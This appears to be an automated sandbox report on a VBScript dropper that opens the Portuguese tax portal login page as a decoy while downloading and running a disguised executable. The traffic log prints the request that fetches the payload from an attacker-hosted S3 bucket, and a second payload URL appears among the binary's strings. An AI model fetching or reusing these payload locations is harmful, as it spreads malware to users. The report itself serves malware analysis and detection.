Windows Analysis Report
GuiaAT256201.vbs

Overview

General Information

Sample name: GuiaAT256201.vbs
Analysis ID: 1597922
MD5: f9456f939cf31d52b97caecf5cba4fe4
SHA1: abc4fefa321e5991563d42b402770d72ef0f01cf
SHA256: 1862ca13445df8799db87dacf311067c7f529ca46c7fcf44516fd908e6312eb2

Detection

Score: 76
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Benign windows process drops PE files
System process connects to network (likely due to code injection or exploit)
Sigma detected: Execution from Suspicious Folder
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: WScript or CScript Dropper
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Creates a process in suspended mode (likely to inject code)
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
HTML title does not match URL
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sigma detected: Script Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • wscript.exe (PID: 6800 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\GuiaAT256201.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • chrome.exe (PID: 3840 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.acesso.gov.pt/v2/loginForm?partID=PFAP MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 7196 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2088 --field-trial-handle=2040,i,14633557413047616428,5381384248003885766,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • playoff.exe (PID: 8028 cmdline: "C:\users\public\xboxtv\playoff.exe" MD5: D09260D8B9A5B5E8FAB0E3FA7EBA1D58)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems), Tim Shelton | Data: Command: "C:\users\public\xboxtv\playoff.exe", CommandLine: "C:\users\public\xboxtv\playoff.exe", CommandLine|base64offset|contains: , Image: C:\Users\Public\xboxtv\playoff.exe, NewProcessName: C:\Users\Public\xboxtv\playoff.exe, OriginalFileName: C:\Users\Public\xboxtv\playoff.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\GuiaAT256201.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 6800, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\users\public\xboxtv\playoff.exe", ProcessId: 8028, ProcessName: playoff.exe
Source: Network Connection | Author: frack113, Florian Roth | Data: DestinationIp: 3.5.216.50, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 6800, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49704
Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\GuiaAT256201.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\GuiaAT256201.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\GuiaAT256201.vbs", ProcessId: 6800, ProcessName: wscript.exe
Source: File created | Author: Florian Roth (Nextron Systems) | Data: EventID: 11, Image: C:\Windows\System32\wscript.exe, ProcessId: 6800, TargetFilename: C:\Users\Public\xboxtv.zip
Source: Network Connection | Author: frack113 | Data: DestinationIp: 3.5.216.50, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 6800, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49704
Source: Process started | Author: Michael Haag | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\GuiaAT256201.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\GuiaAT256201.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\GuiaAT256201.vbs", ProcessId: 6800, ProcessName: wscript.exe
No Suricata rule has matched

Source: https://www.acesso.gov.pt/v2/loginForm?partID=PFAP | HTTP Parser: Title: acesso.gov.pt does not match URL
Source: https://www.acesso.gov.pt/v2/loginForm?partID=PFAP | HTTP Parser: <input type="password" .../> found
Source: https://www.acesso.gov.pt/v2/loginForm?partID=PFAP | HTTP Parser: No <meta name="author".. found
Source: https://www.acesso.gov.pt/v2/loginForm?partID=PFAP | HTTP Parser: No <meta name="copyright".. found
Source: unknown | HTTPS traffic detected: 3.5.216.50:443 -> 192.168.2.5:49704 version: TLS 1.2

Networking

Source: C:\Windows\System32\wscript.exe | Network Connect: 3.5.216.50 443
Source: Joe Sandbox View | IP Address: 62.28.254.215
Source: Joe Sandbox View | IP Address: 239.255.255.250
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown | TCP traffic detected without corresponding DNS query: 23.1.237.91 (7 occurrences)
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (11 occurrences)
Source: global traffic | HTTP traffic detected:
  GET /xboxtv.mpeg HTTP/1.1
  Accept: */*
  Accept-Language: en-ch
  UA-CPU: AMD64
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: playoffchampions.s3.eu-north-1.amazonaws.com
  Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
  GET /v2/loginForm?partID=PFAP HTTP/1.1
  Host: www.acesso.gov.pt
  Connection: keep-alive
  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
  sec-ch-ua-mobile: ?0
  sec-ch-ua-platform: "Windows"
  Upgrade-Insecure-Requests: 1
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  Sec-Fetch-Site: none
  Sec-Fetch-Mode: navigate
  Sec-Fetch-User: ?1
  Sec-Fetch-Dest: document
  Accept-Encoding: gzip, deflate, br
  Accept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /autentica_static/js/app.js?cb=5.2.14 HTTP/1.1Host: www.acesso.gov.ptConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.acesso.gov.pt/v2/loginForm?partID=PFAPAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ADRUM_BTa=R:0|g:3456e7b1-061b-466c-9917-b4d449a90644|n:customer1_ce667124-ad2e-4cec-9605-d46ab36ccf73; SameSite=None; ADRUM_BT1=R:0|i:26383|e:9; autentica_JSessionID=0yGUWL-tDrpV-dRbYlT4_nilHZq1zq3H66cHGlOgKue8VTFTKq1v!-583688011!-300282855; AT_P=!JOTw1azzUazpv5uXNCYICHCNuUpMadNCTQ1TwzO2BnURPP8ufo7RG9hD0MgwxoP68Hy1JxEt9n0/sLo=; TS017b475d=01e43c52fec4824682e931aea7dbe99fc0da8ef7a5332311d3b9fc9457150550b8660f940edb60af9b9ebf9d6c66f888962fd17bc6; TSbfdc4c04027=08def0a5edab20002afdebab6ceade4bbf702402da574956e2d3d2603a9f6e2ef0736dc704abc62508639a79311130005df524463572ab5ee183f3a82a1f291d806bcd98f43f85350a9f2f65d995ac995ab16bb6adbac0f0bee883cfe775e1b6
Source: global trafficHTTP traffic detected: GET /autentica_static/js/bootstrap/bootstrap-3.3.4.min.js?cb=5.2.14 HTTP/1.1Host: www.acesso.gov.ptConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.acesso.gov.pt/v2/loginForm?partID=PFAPAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ADRUM_BTa=R:0|g:3456e7b1-061b-466c-9917-b4d449a90644|n:customer1_ce667124-ad2e-4cec-9605-d46ab36ccf73; SameSite=None; ADRUM_BT1=R:0|i:26383|e:9; autentica_JSessionID=0yGUWL-tDrpV-dRbYlT4_nilHZq1zq3H66cHGlOgKue8VTFTKq1v!-583688011!-300282855; AT_P=!JOTw1azzUazpv5uXNCYICHCNuUpMadNCTQ1TwzO2BnURPP8ufo7RG9hD0MgwxoP68Hy1JxEt9n0/sLo=; TS017b475d=01e43c52fec4824682e931aea7dbe99fc0da8ef7a5332311d3b9fc9457150550b8660f940edb60af9b9ebf9d6c66f888962fd17bc6; TSbfdc4c04027=08def0a5edab20002afdebab6ceade4bbf702402da574956e2d3d2603a9f6e2ef0736dc704abc62508639a79311130005df524463572ab5ee183f3a82a1f291d806bcd98f43f85350a9f2f65d995ac995ab16bb6adbac0f0bee883cfe775e1b6
Source: global trafficHTTP traffic detected: GET /autentica_static/js/capslock-login.js?cb=5.2.14 HTTP/1.1Host: www.acesso.gov.ptConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.acesso.gov.pt/v2/loginForm?partID=PFAPAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ADRUM_BTa=R:0|g:3456e7b1-061b-466c-9917-b4d449a90644|n:customer1_ce667124-ad2e-4cec-9605-d46ab36ccf73; SameSite=None; ADRUM_BT1=R:0|i:26383|e:9; autentica_JSessionID=0yGUWL-tDrpV-dRbYlT4_nilHZq1zq3H66cHGlOgKue8VTFTKq1v!-583688011!-300282855; AT_P=!JOTw1azzUazpv5uXNCYICHCNuUpMadNCTQ1TwzO2BnURPP8ufo7RG9hD0MgwxoP68Hy1JxEt9n0/sLo=; TS017b475d=01e43c52fec4824682e931aea7dbe99fc0da8ef7a5332311d3b9fc9457150550b8660f940edb60af9b9ebf9d6c66f888962fd17bc6; TSbfdc4c04027=08def0a5edab20002afdebab6ceade4bbf702402da574956e2d3d2603a9f6e2ef0736dc704abc62508639a79311130005df524463572ab5ee183f3a82a1f291d806bcd98f43f85350a9f2f65d995ac995ab16bb6adbac0f0bee883cfe775e1b6
Source: global trafficHTTP traffic detected: GET /autentica_static/js/smartresize.js?cb=5.2.14 HTTP/1.1Host: www.acesso.gov.ptConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ADRUM_BTa=R:0|g:3456e7b1-061b-466c-9917-b4d449a90644|n:customer1_ce667124-ad2e-4cec-9605-d46ab36ccf73; SameSite=None; ADRUM_BT1=R:0|i:26383|e:9; autentica_JSessionID=0yGUWL-tDrpV-dRbYlT4_nilHZq1zq3H66cHGlOgKue8VTFTKq1v!-583688011!-300282855; AT_P=!JOTw1azzUazpv5uXNCYICHCNuUpMadNCTQ1TwzO2BnURPP8ufo7RG9hD0MgwxoP68Hy1JxEt9n0/sLo=; TS017b475d=01e43c52fec4824682e931aea7dbe99fc0da8ef7a5332311d3b9fc9457150550b8660f940edb60af9b9ebf9d6c66f888962fd17bc6; TSbfdc4c04027=08def0a5edab20002afdebab6ceade4bbf702402da574956e2d3d2603a9f6e2ef0736dc704abc62508639a79311130005df524463572ab5ee183f3a82a1f291d806bcd98f43f85350a9f2f65d995ac995ab16bb6adbac0f0bee883cfe775e1b6
Source: global trafficHTTP traffic detected: GET /autentica_static/img/logo-at.png HTTP/1.1Host: www.acesso.gov.ptConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ADRUM_BTa=R:0|g:3456e7b1-061b-466c-9917-b4d449a90644|n:customer1_ce667124-ad2e-4cec-9605-d46ab36ccf73; SameSite=None; ADRUM_BT1=R:0|i:26383|e:9; autentica_JSessionID=0yGUWL-tDrpV-dRbYlT4_nilHZq1zq3H66cHGlOgKue8VTFTKq1v!-583688011!-300282855; AT_P=!JOTw1azzUazpv5uXNCYICHCNuUpMadNCTQ1TwzO2BnURPP8ufo7RG9hD0MgwxoP68Hy1JxEt9n0/sLo=; TS017b475d=01e43c52fec4824682e931aea7dbe99fc0da8ef7a5332311d3b9fc9457150550b8660f940edb60af9b9ebf9d6c66f888962fd17bc6; TSbfdc4c04027=08def0a5edab20002afdebab6ceade4bbf702402da574956e2d3d2603a9f6e2ef0736dc704abc62508639a79311130005df524463572ab5ee183f3a82a1f291d806bcd98f43f85350a9f2f65d995ac995ab16bb6adbac0f0bee883cfe775e1b6
Source: global trafficHTTP traffic detected: GET /autentica_static/js/jquery/jquery.uniform.min.js?cb=5.2.14 HTTP/1.1Host: www.acesso.gov.ptConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ADRUM_BTa=R:0|g:3456e7b1-061b-466c-9917-b4d449a90644|n:customer1_ce667124-ad2e-4cec-9605-d46ab36ccf73; SameSite=None; ADRUM_BT1=R:0|i:26383|e:9; autentica_JSessionID=0yGUWL-tDrpV-dRbYlT4_nilHZq1zq3H66cHGlOgKue8VTFTKq1v!-583688011!-300282855; AT_P=!JOTw1azzUazpv5uXNCYICHCNuUpMadNCTQ1TwzO2BnURPP8ufo7RG9hD0MgwxoP68Hy1JxEt9n0/sLo=; TS017b475d=01e43c52fec4824682e931aea7dbe99fc0da8ef7a5332311d3b9fc9457150550b8660f940edb60af9b9ebf9d6c66f888962fd17bc6; TSbfdc4c04027=08def0a5edab20002afdebab6ceade4bbf702402da574956e2d3d2603a9f6e2ef0736dc704abc62508639a79311130005df524463572ab5ee183f3a82a1f291d806bcd98f43f85350a9f2f65d995ac995ab16bb6adbac0f0bee883cfe775e1b6
Source: global trafficHTTP traffic detected: GET /autentica_static/img/background.png HTTP/1.1Host: www.acesso.gov.ptConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ADRUM_BTa=R:0|g:3456e7b1-061b-466c-9917-b4d449a90644|n:customer1_ce667124-ad2e-4cec-9605-d46ab36ccf73; SameSite=None; ADRUM_BT1=R:0|i:26383|e:9; autentica_JSessionID=0yGUWL-tDrpV-dRbYlT4_nilHZq1zq3H66cHGlOgKue8VTFTKq1v!-583688011!-300282855; AT_P=!JOTw1azzUazpv5uXNCYICHCNuUpMadNCTQ1TwzO2BnURPP8ufo7RG9hD0MgwxoP68Hy1JxEt9n0/sLo=; TS017b475d=01e43c52fec4824682e931aea7dbe99fc0da8ef7a5332311d3b9fc9457150550b8660f940edb60af9b9ebf9d6c66f888962fd17bc6; TSbfdc4c04027=08def0a5edab20002afdebab6ceade4bbf702402da574956e2d3d2603a9f6e2ef0736dc704abc62508639a79311130005df524463572ab5ee183f3a82a1f291d806bcd98f43f85350a9f2f65d995ac995ab16bb6adbac0f0bee883cfe775e1b6
Source: global trafficHTTP traffic detected: GET /autentica_static/js/jquery/jquery.validate.min.js?cb=5.2.14 HTTP/1.1Host: www.acesso.gov.ptConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ADRUM_BTa=R:0|g:3456e7b1-061b-466c-9917-b4d449a90644|n:customer1_ce667124-ad2e-4cec-9605-d46ab36ccf73; SameSite=None; ADRUM_BT1=R:0|i:26383|e:9; autentica_JSessionID=0yGUWL-tDrpV-dRbYlT4_nilHZq1zq3H66cHGlOgKue8VTFTKq1v!-583688011!-300282855; AT_P=!JOTw1azzUazpv5uXNCYICHCNuUpMadNCTQ1TwzO2BnURPP8ufo7RG9hD0MgwxoP68Hy1JxEt9n0/sLo=; TS017b475d=01e43c52fec4824682e931aea7dbe99fc0da8ef7a5332311d3b9fc9457150550b8660f940edb60af9b9ebf9d6c66f888962fd17bc6; TSbfdc4c04027=08def0a5edab20002afdebab6ceade4bbf702402da574956e2d3d2603a9f6e2ef0736dc704abc62508639a79311130005df524463572ab5ee183f3a82a1f291d806bcd98f43f85350a9f2f65d995ac995ab16bb6adbac0f0bee883cfe775e1b6
Source: global trafficHTTP traffic detected: GET /autentica_static/js/jquery/jquery-1.11.1.min.js?cb=5.2.14 HTTP/1.1Host: www.acesso.gov.ptConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ADRUM_BTa=R:0|g:3456e7b1-061b-466c-9917-b4d449a90644|n:customer1_ce667124-ad2e-4cec-9605-d46ab36ccf73; SameSite=None; ADRUM_BT1=R:0|i:26383|e:9; autentica_JSessionID=0yGUWL-tDrpV-dRbYlT4_nilHZq1zq3H66cHGlOgKue8VTFTKq1v!-583688011!-300282855; AT_P=!JOTw1azzUazpv5uXNCYICHCNuUpMadNCTQ1TwzO2BnURPP8ufo7RG9hD0MgwxoP68Hy1JxEt9n0/sLo=; TS017b475d=01e43c52fec4824682e931aea7dbe99fc0da8ef7a5332311d3b9fc9457150550b8660f940edb60af9b9ebf9d6c66f888962fd17bc6; TSbfdc4c04027=08def0a5edab20002afdebab6ceade4bbf702402da574956e2d3d2603a9f6e2ef0736dc704abc62508639a79311130005df524463572ab5ee183f3a82a1f291d806bcd98f43f85350a9f2f65d995ac995ab16bb6adbac0f0bee883cfe775e1b6
Source: global trafficHTTP traffic detected: GET /autentica_static/js/capslock-login.js?cb=5.2.14 HTTP/1.1Host: www.acesso.gov.ptConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ADRUM_BTa=R:0|g:3456e7b1-061b-466c-9917-b4d449a90644|n:customer1_ce667124-ad2e-4cec-9605-d46ab36ccf73; SameSite=None; ADRUM_BT1=R:0|i:26383|e:9; autentica_JSessionID=0yGUWL-tDrpV-dRbYlT4_nilHZq1zq3H66cHGlOgKue8VTFTKq1v!-583688011!-300282855; AT_P=!JOTw1azzUazpv5uXNCYICHCNuUpMadNCTQ1TwzO2BnURPP8ufo7RG9hD0MgwxoP68Hy1JxEt9n0/sLo=; TS017b475d=01e43c52fec4824682e931aea7dbe99fc0da8ef7a5332311d3b9fc9457150550b8660f940edb60af9b9ebf9d6c66f888962fd17bc6; TSbfdc4c04027=08def0a5edab20002afdebab6ceade4bbf702402da574956e2d3d2603a9f6e2ef0736dc704abc62508639a79311130005df524463572ab5ee183f3a82a1f291d806bcd98f43f85350a9f2f65d995ac995ab16bb6adbac0f0bee883cfe775e1b6
Source: global trafficHTTP traffic detected: GET /autentica_static/js/app.js?cb=5.2.14 HTTP/1.1Host: www.acesso.gov.ptConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ADRUM_BTa=R:0|g:3456e7b1-061b-466c-9917-b4d449a90644|n:customer1_ce667124-ad2e-4cec-9605-d46ab36ccf73; SameSite=None; ADRUM_BT1=R:0|i:26383|e:9; autentica_JSessionID=0yGUWL-tDrpV-dRbYlT4_nilHZq1zq3H66cHGlOgKue8VTFTKq1v!-583688011!-300282855; AT_P=!JOTw1azzUazpv5uXNCYICHCNuUpMadNCTQ1TwzO2BnURPP8ufo7RG9hD0MgwxoP68Hy1JxEt9n0/sLo=; TS017b475d=01e43c52fec4824682e931aea7dbe99fc0da8ef7a5332311d3b9fc9457150550b8660f940edb60af9b9ebf9d6c66f888962fd17bc6; TSbfdc4c04027=08def0a5edab20002afdebab6ceade4bbf702402da574956e2d3d2603a9f6e2ef0736dc704abc62508639a79311130005df524463572ab5ee183f3a82a1f291d806bcd98f43f85350a9f2f65d995ac995ab16bb6adbac0f0bee883cfe775e1b6
Source: global trafficHTTP traffic detected: GET /autentica_static/js/bootstrap/bootstrap-3.3.4.min.js?cb=5.2.14 HTTP/1.1Host: www.acesso.gov.ptConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ADRUM_BTa=R:0|g:3456e7b1-061b-466c-9917-b4d449a90644|n:customer1_ce667124-ad2e-4cec-9605-d46ab36ccf73; SameSite=None; ADRUM_BT1=R:0|i:26383|e:9; autentica_JSessionID=0yGUWL-tDrpV-dRbYlT4_nilHZq1zq3H66cHGlOgKue8VTFTKq1v!-583688011!-300282855; AT_P=!JOTw1azzUazpv5uXNCYICHCNuUpMadNCTQ1TwzO2BnURPP8ufo7RG9hD0MgwxoP68Hy1JxEt9n0/sLo=; TS017b475d=01e43c52fec4824682e931aea7dbe99fc0da8ef7a5332311d3b9fc9457150550b8660f940edb60af9b9ebf9d6c66f888962fd17bc6; TSbfdc4c04027=08def0a5edab20002afdebab6ceade4bbf702402da574956e2d3d2603a9f6e2ef0736dc704abc62508639a79311130005df524463572ab5ee183f3a82a1f291d806bcd98f43f85350a9f2f65d995ac995ab16bb6adbac0f0bee883cfe775e1b6
Source: global trafficHTTP traffic detected: GET /autentica_static/icons/favicon.ico HTTP/1.1Host: www.acesso.gov.ptConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.acesso.gov.pt/v2/loginForm?partID=PFAPAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ADRUM_BTa=R:0|g:3456e7b1-061b-466c-9917-b4d449a90644|n:customer1_ce667124-ad2e-4cec-9605-d46ab36ccf73; SameSite=None; ADRUM_BT1=R:0|i:26383|e:9; autentica_JSessionID=0yGUWL-tDrpV-dRbYlT4_nilHZq1zq3H66cHGlOgKue8VTFTKq1v!-583688011!-300282855; AT_P=!JOTw1azzUazpv5uXNCYICHCNuUpMadNCTQ1TwzO2BnURPP8ufo7RG9hD0MgwxoP68Hy1JxEt9n0/sLo=; TS017b475d=01e43c52fec4824682e931aea7dbe99fc0da8ef7a5332311d3b9fc9457150550b8660f940edb60af9b9ebf9d6c66f888962fd17bc6; TSbfdc4c04027=08def0a5edab20002afdebab6ceade4bbf702402da574956e2d3d2603a9f6e2ef0736dc704abc62508639a79311130005df524463572ab5ee183f3a82a1f291d806bcd98f43f85350a9f2f65d995ac995ab16bb6adbac0f0bee883cfe775e1b6
Source: global trafficHTTP traffic detected: GET /autentica_static/icons/favicon.ico HTTP/1.1Host: www.acesso.gov.ptConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ADRUM_BTa=R:0|g:3456e7b1-061b-466c-9917-b4d449a90644|n:customer1_ce667124-ad2e-4cec-9605-d46ab36ccf73; SameSite=None; ADRUM_BT1=R:0|i:26383|e:9; autentica_JSessionID=0yGUWL-tDrpV-dRbYlT4_nilHZq1zq3H66cHGlOgKue8VTFTKq1v!-583688011!-300282855; AT_P=!JOTw1azzUazpv5uXNCYICHCNuUpMadNCTQ1TwzO2BnURPP8ufo7RG9hD0MgwxoP68Hy1JxEt9n0/sLo=; TS017b475d=01e43c52fec4824682e931aea7dbe99fc0da8ef7a5332311d3b9fc9457150550b8660f940edb60af9b9ebf9d6c66f888962fd17bc6; TSbfdc4c04027=08def0a5edab20002afdebab6ceade4bbf702402da574956e2d3d2603a9f6e2ef0736dc704abc62508639a79311130005df524463572ab5ee183f3a82a1f291d806bcd98f43f85350a9f2f65d995ac995ab16bb6adbac0f0bee883cfe775e1b6
Source: global traffic | DNS traffic detected: DNS query: playoffchampions.s3.eu-north-1.amazonaws.com
Source: global traffic | DNS traffic detected: DNS query: www.acesso.gov.pt
Source: global traffic | DNS traffic detected: DNS query: static.portaldasfinancas.gov.pt
Source: global traffic | DNS traffic detected: DNS query: www.google.com
Source: chromecache_94.4.dr | String found in binary or memory: http://fontawesome.io
Source: chromecache_94.4.dr | String found in binary or memory: http://fontawesome.io/license
Source: chromecache_93.4.dr, chromecache_88.4.dr, chromecache_109.4.dr | String found in binary or memory: http://getbootstrap.com)
Source: chromecache_117.4.dr, chromecache_108.4.dr | String found in binary or memory: http://jqueryvalidation.org/
Source: chromecache_96.4.dr, chromecache_103.4.dr | String found in binary or memory: http://modernizr.com/download/#-shiv-addtest-prefixed-teststyles-testprop-testallprops-hasevent-pref
Source: chromecache_100.4.dr, chromecache_113.4.dr | String found in binary or memory: http://unscriptable.com/index.php/2009/03/20/debouncing-javascript-methods/
Source: playoff.exe, 00000007.00000000.2223508151.00000000002C9000.00000020.00000001.01000000.0000000B.sdmp, playoff.exe, 00000007.00000003.2228095895.0000017A563EC000.00000004.00001000.00020000.00000000.sdmp, playoff.exe.0.dr | String found in binary or memory: https://ailiadasclubdasmilhas.s3.eu-north-1.amazonaws.com/CafeMusic.mpeg
